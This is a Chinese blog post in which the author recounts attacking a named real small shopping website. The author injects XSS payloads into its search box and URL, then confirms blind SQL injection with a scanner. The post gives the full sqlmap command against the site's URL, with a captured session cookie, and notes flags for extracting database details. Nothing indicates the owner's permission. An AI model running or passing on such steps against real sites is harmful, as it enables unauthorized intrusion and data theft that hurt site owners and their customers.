最近一直在忙着挖个洞出来
听说一般小点的购物网站会存在漏洞比较多
于是找到了这个http://www.kaitaibh.com
遵循xss“见框就插”的原则
在搜索框随意插入xss攻击代码

<script>alert(0)</script>

<img src=0 onerrot=alert(0)>

开始并未触发 发现url中 > 被过滤
直接在url改

成功
然后想试试有没有逻辑漏洞,结果注册需要实体店会员就放弃了
然后awvs扫了一下(其实在看到例如id=997这种情况也可以拖进sqlmap试试有没有注入)
发现有SQL盲注漏洞

开始利用SQLMap进行注入
一开始失败
原因是此链接需要cookie维持会话
通过开发者工具获取cookie

构造攻击代码

python sqlmap.py -u http://www.kaitaibh.com/List.aspx?c1=721 --cookie "ASP.NET_SessionId=q3zyheyf51mgdzjkvywvzund; __tins__17307904=%7B%22sid%22%3A%201582435208829%2C%20%22vd%22%3A%207%2C%20%22expires%22%3A%201582437399178%7D; __51cke__=; __51laig__=7"

注入成功
加上 -b 可获取数据库版本

其他命令即可获取更多信息

最后修改:2020 年 10 月 18 日
如果觉得我的文章对你有用,请随意赞赏